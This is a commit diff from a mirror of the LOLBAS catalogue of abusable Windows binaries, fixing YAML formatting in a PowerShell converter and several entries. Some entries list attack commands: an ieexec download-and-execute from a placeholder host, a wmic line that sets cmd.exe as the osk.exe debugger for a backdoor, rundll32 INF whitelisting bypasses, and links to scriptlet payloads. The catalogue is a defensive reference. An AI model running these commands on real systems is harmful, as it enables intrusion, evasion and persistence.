mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-26 14:59:03 +01:00
Minor adjustments to be yaml compliant
This commit is contained in:
parent
37cc1ee83e
commit
f8fec9849b
@ -29,16 +29,16 @@ function Convert-YamlToMD
|
|||||||
"name: $($YamlObject.Name)"| Add-Content $Outfile
|
"name: $($YamlObject.Name)"| Add-Content $Outfile
|
||||||
"description: $($YamlObject.Description)"| Add-Content $Outfile
|
"description: $($YamlObject.Description)"| Add-Content $Outfile
|
||||||
"function:"| Add-Content $Outfile
|
"function:"| Add-Content $Outfile
|
||||||
# Need a category linked to the different things... Execute, Download, AWL-bypass.
|
|
||||||
|
|
||||||
foreach($cmd in $YamlObject.Commands)
|
foreach($cmd in $YamlObject.Commands)
|
||||||
{
|
{
|
||||||
" $($cmd.Category):"| Add-Content $Outfile
|
" $($cmd.Category):"| Add-Content $Outfile
|
||||||
" - description: $($cmd.Description)"| Add-Content $Outfile
|
" - description: $($cmd.Description)"| Add-Content $Outfile
|
||||||
" code: $($cmd.Command)"| Add-Content $Outfile
|
" code: $($cmd.Command)"| Add-Content $Outfile
|
||||||
" code: $($cmd.Command)"| Add-Content $Outfile
|
|
||||||
" mitreid: $($cmd.MitreID)"| Add-Content $Outfile
|
" mitreid: $($cmd.MitreID)"| Add-Content $Outfile
|
||||||
" mitrelink: $($cmd.MitreLink)"| Add-Content $Outfile
|
" mitrelink: $($cmd.MitreLink)"| Add-Content $Outfile
|
||||||
|
" operatingsystem: $($cmd.Operatingsystem)"| Add-Content $Outfile
|
||||||
|
" privileges: $($cmd.Privileges)"| Add-Content $Outfile
|
||||||
}
|
}
|
||||||
"resources:"| Add-Content $Outfile
|
"resources:"| Add-Content $Outfile
|
||||||
foreach($link in $YamlObject.Resources)
|
foreach($link in $YamlObject.Resources)
|
||||||
@ -48,9 +48,14 @@ function Convert-YamlToMD
|
|||||||
"fullpath:"| Add-Content $Outfile
|
"fullpath:"| Add-Content $Outfile
|
||||||
foreach($path in $YamlObject.'Full path')
|
foreach($path in $YamlObject.'Full path')
|
||||||
{
|
{
|
||||||
" - path: $($path)"| Add-Content $Outfile
|
" - Path: $($path)"| Add-Content $Outfile
|
||||||
|
}
|
||||||
|
"acknowledgement:"| Add-Content $Outfile
|
||||||
|
foreach($pers in $YamlObject.Acknowledgement)
|
||||||
|
{
|
||||||
|
" - Person: $($pers.Person)"| Add-Content $Outfile
|
||||||
|
" Handle: `'$($pers.Handle)`'"| Add-Content $Outfile
|
||||||
}
|
}
|
||||||
"notes: $($YamlObject.Notes)"| Add-Content $Outfile
|
|
||||||
"---" | Add-Content $Outfile
|
"---" | Add-Content $Outfile
|
||||||
}
|
}
|
||||||
End
|
End
|
||||||
@ -112,11 +117,11 @@ function Invoke-GenerateMD
|
|||||||
|
|
||||||
#Generate the stuff!
|
#Generate the stuff!
|
||||||
#Bins
|
#Bins
|
||||||
#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSBinaries" -Outpath "c:\tamp\Binaries" -Verbose
|
##Invoke-GenerateMD -YmlPath "$mainpath\yml\OSBinaries" -Outpath "c:\tamp\Binaries" -Verbose
|
||||||
Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherMSBinaries" -Outpath "c:\tamp\OtherMSBinaries" -Verbose
|
Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherMSBinaries" -Outpath "c:\tamp\OtherMSBinaries" -Verbose
|
||||||
|
|
||||||
##Scripts
|
##Scripts
|
||||||
#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSScripts" -Outpath "c:\tamp\SCripts" -Verbose
|
##Invoke-GenerateMD -YmlPath "$mainpath\yml\OSScripts" -Outpath "c:\tamp\Scripts" -Verbose
|
||||||
|
|
||||||
##Libs
|
##Libs
|
||||||
#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSLibraries" -Outpath "c:\tamp\Libraries" -Verbose
|
##Invoke-GenerateMD -YmlPath "$mainpath\yml\OSLibraries" -Outpath "c:\tamp\Libraries" -Verbose
|
@ -24,7 +24,7 @@ Full Path:
|
|||||||
- Path: C:\Windows\System32\bash.exe
|
- Path: C:\Windows\System32\bash.exe
|
||||||
- Path: C:\Windows\SysWOW64\bash.exe
|
- Path: C:\Windows\SysWOW64\bash.exe
|
||||||
Code Sample:
|
Code Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Child process from bash.exe
|
- IOC: Child process from bash.exe
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -40,7 +40,7 @@ Full Path:
|
|||||||
- Path: C:\Windows\System32\bitsadmin.exe
|
- Path: C:\Windows\System32\bitsadmin.exe
|
||||||
- Path: C:\Windows\SysWOW64\bitsadmin.exe
|
- Path: C:\Windows\SysWOW64\bitsadmin.exe
|
||||||
Code Sample:
|
Code Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Child process from bitsadmin.exe
|
- IOC: Child process from bitsadmin.exe
|
||||||
- IOC: bitsadmin creates new files
|
- IOC: bitsadmin creates new files
|
||||||
|
@ -40,7 +40,7 @@ Full Path:
|
|||||||
- Path: C:\Windows\System32\certutil.exe
|
- Path: C:\Windows\System32\certutil.exe
|
||||||
- Path: C:\Windows\SysWOW64\certutil.exe
|
- Path: C:\Windows\SysWOW64\certutil.exe
|
||||||
Code Sample:
|
Code Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Certutil.exe creating new files on disk
|
- IOC: Certutil.exe creating new files on disk
|
||||||
- IOC: Useragent Microsoft-CryptoAPI/10.0
|
- IOC: Useragent Microsoft-CryptoAPI/10.0
|
||||||
|
@ -4,7 +4,7 @@ Description: The IEExec.exe application is an undocumented Microsoft .NET Framew
|
|||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: '2018-05-25'
|
||||||
Commands:
|
Commands:
|
||||||
- Command:ieexec.exe http://x.x.x.x:8080/bypass.exe
|
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||||
Description: Downloads and executes bypass.exe from the remote server.
|
Description: Downloads and executes bypass.exe from the remote server.
|
||||||
Usecase: Download and run attacker code from remote location
|
Usecase: Download and run attacker code from remote location
|
||||||
Category: Download
|
Category: Download
|
||||||
@ -12,7 +12,7 @@ Commands:
|
|||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command:ieexec.exe http://x.x.x.x:8080/bypass.exe
|
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||||
Description: Downloads and executes bypass.exe from the remote server.
|
Description: Downloads and executes bypass.exe from the remote server.
|
||||||
Usecase: Download and run attacker code from remote location
|
Usecase: Download and run attacker code from remote location
|
||||||
Category: Execute
|
Category: Execute
|
||||||
@ -24,7 +24,7 @@ Full Path:
|
|||||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
|
||||||
Code Sample:
|
Code Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -40,7 +40,7 @@ Full Path:
|
|||||||
- Path: C:\Windows\System32\msiexec.exe
|
- Path: C:\Windows\System32\msiexec.exe
|
||||||
- Path: C:\Windows\SysWOW64\msiexec.exe
|
- Path: C:\Windows\SysWOW64\msiexec.exe
|
||||||
Code Sample:
|
Code Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: msiexec.exe getting files from Internet
|
- IOC: msiexec.exe getting files from Internet
|
||||||
Resources:
|
Resources:
|
||||||
@ -50,5 +50,5 @@ Acknowledgement:
|
|||||||
- Person: netbiosX
|
- Person: netbiosX
|
||||||
Handle: '@netbiosX'
|
Handle: '@netbiosX'
|
||||||
- Person: Philip Tsukerman
|
- Person: Philip Tsukerman
|
||||||
Handle: @PhilipTsukerman
|
Handle: '@PhilipTsukerman'
|
||||||
---
|
---
|
@ -31,7 +31,7 @@ Commands:
|
|||||||
Full Path:
|
Full Path:
|
||||||
- Path: C:\Windows\System32\pcalua.exe
|
- Path: C:\Windows\System32\pcalua.exe
|
||||||
Code Sample:
|
Code Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
@ -40,5 +40,5 @@ Acknowledgement:
|
|||||||
- Person: Kyle Hanslovan
|
- Person: Kyle Hanslovan
|
||||||
Handle: '@kylehanslovan'
|
Handle: '@kylehanslovan'
|
||||||
- Person: Fab
|
- Person: Fab
|
||||||
Handle: @0rbz_
|
Handle: '@0rbz_'
|
||||||
---
|
---
|
@ -1,4 +1,4 @@
|
|||||||
---
|
---
|
||||||
Name: Wab.exe
|
Name: Wab.exe
|
||||||
Description: Windows address book manager
|
Description: Windows address book manager
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
@ -16,7 +16,7 @@ Full Path:
|
|||||||
- Path: C:\Program Files\Windows Mail\wab.exe
|
- Path: C:\Program Files\Windows Mail\wab.exe
|
||||||
- Path: C:\Program Files (x86)\Windows Mail\wab.exe
|
- Path: C:\Program Files (x86)\Windows Mail\wab.exe
|
||||||
Code Sample:
|
Code Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: WAB.exe should normally never be used
|
- IOC: WAB.exe should normally never be used
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -5,7 +5,7 @@ Author: 'Oddvar Moe'
|
|||||||
Created: '2018-05-25'
|
Created: '2018-05-25'
|
||||||
Commands:
|
Commands:
|
||||||
- Command: wmic.exe process call create "c:\ads\file.txt:program.exe"
|
- Command: wmic.exe process call create "c:\ads\file.txt:program.exe"
|
||||||
Description: Execute a .EXE file stored as an Alternate Data Stream (ADS).
|
Description: Execute a .EXE file stored as an Alternate Data Stream (ADS)
|
||||||
Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures
|
Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures
|
||||||
Category: Alternate data streams
|
Category: Alternate data streams
|
||||||
Privileges: User
|
Privileges: User
|
||||||
@ -20,7 +20,7 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
|
- Command: 'wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"'
|
||||||
Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
|
Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
|
||||||
Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures
|
Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures
|
||||||
Category: Execute
|
Category: Execute
|
||||||
@ -72,7 +72,7 @@ Full Path:
|
|||||||
- Path: C:\Windows\System32\wmic.exe
|
- Path: C:\Windows\System32\wmic.exe
|
||||||
- Path: C:\Windows\SysWOW64\wmic.exe
|
- Path: C:\Windows\SysWOW64\wmic.exe
|
||||||
Code Sample:
|
Code Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Wmic getting scripts from remote system
|
- IOC: Wmic getting scripts from remote system
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -49,7 +49,7 @@ Code Sample:
|
|||||||
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack.inf
|
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack.inf
|
||||||
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack_calc.sct
|
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack_calc.sct
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: ''
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
|
- Link: https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
|
||||||
- Link: https://twitter.com/ItsReallyNick/status/967859147977850880
|
- Link: https://twitter.com/ItsReallyNick/status/967859147977850880
|
||||||
@ -63,5 +63,5 @@ Acknowledgment:
|
|||||||
- Person: Moriarty (RegisterOCX - CMD)
|
- Person: Moriarty (RegisterOCX - CMD)
|
||||||
Handle: '@moriarty_meng'
|
Handle: '@moriarty_meng'
|
||||||
- Person: Nick Carr (Threat Intel)
|
- Person: Nick Carr (Threat Intel)
|
||||||
Handle: @ItsReallyNick
|
Handle: '@ItsReallyNick'
|
||||||
---
|
---
|
@ -10,7 +10,7 @@ Commands:
|
|||||||
Category: AWL Bypass
|
Category: AWL Bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1085
|
MitreID: T1085
|
||||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf
|
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf
|
||||||
Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
|
Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
|
||||||
@ -18,7 +18,7 @@ Commands:
|
|||||||
Category: Execution
|
Category: Execution
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1085
|
MitreID: T1085
|
||||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full Path:
|
Full Path:
|
||||||
- Path: c:\windows\system32\setupapi.dll
|
- Path: c:\windows\system32\setupapi.dll
|
||||||
@ -29,7 +29,7 @@ Code Sample:
|
|||||||
- Code: https://gist.githubusercontent.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba/raw/6cb52b88bcc929f5555cd302d9ed848b7e407052/Backdoor-Minimalist.sct
|
- Code: https://gist.githubusercontent.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba/raw/6cb52b88bcc929f5555cd302d9ed848b7e407052/Backdoor-Minimalist.sct
|
||||||
- Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf
|
- Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: ''
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://github.com/huntresslabs/evading-autoruns
|
- Link: https://github.com/huntresslabs/evading-autoruns
|
||||||
- Link: https://twitter.com/pabraeken/status/994742106852941825
|
- Link: https://twitter.com/pabraeken/status/994742106852941825
|
||||||
@ -42,5 +42,5 @@ Acknowledgment:
|
|||||||
- Person: Casey Smith (COM Scriptlet)
|
- Person: Casey Smith (COM Scriptlet)
|
||||||
Handle: '@subTee'
|
Handle: '@subTee'
|
||||||
- Person: Nick Carr (Threat Intel)
|
- Person: Nick Carr (Threat Intel)
|
||||||
Handle: @ItsReallyNick
|
Handle: '@ItsReallyNick'
|
||||||
---
|
---
|
@ -6,11 +6,11 @@ Created: '2018-05-25'
|
|||||||
Commands:
|
Commands:
|
||||||
- Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf
|
- Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf
|
||||||
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
|
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
|
||||||
UseCase: Run local or remote script(let) code through INF file specification (Note: May pop an error window).
|
UseCase: Run local or remote script(let) code through INF file specification (Note May pop an error window).
|
||||||
Category: AWL Bypass
|
Category: AWL Bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1085
|
MitreID: T1085
|
||||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
- Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf
|
- Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf
|
||||||
Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
|
Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
|
||||||
@ -18,7 +18,7 @@ Commands:
|
|||||||
Category: Execution
|
Category: Execution
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1085
|
MitreID: T1085
|
||||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full Path:
|
Full Path:
|
||||||
- Path: c:\windows\system32\syssetup.dll
|
- Path: c:\windows\system32\syssetup.dll
|
||||||
@ -28,7 +28,7 @@ Code Sample:
|
|||||||
- Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct
|
- Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct
|
||||||
- Code: https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415
|
- Code: https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: ''
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/pabraeken/status/994392481927258113
|
- Link: https://twitter.com/pabraeken/status/994392481927258113
|
||||||
- Link: https://twitter.com/harr0ey/status/975350238184697857
|
- Link: https://twitter.com/harr0ey/status/975350238184697857
|
||||||
|
Loading…
Reference in New Issue
Block a user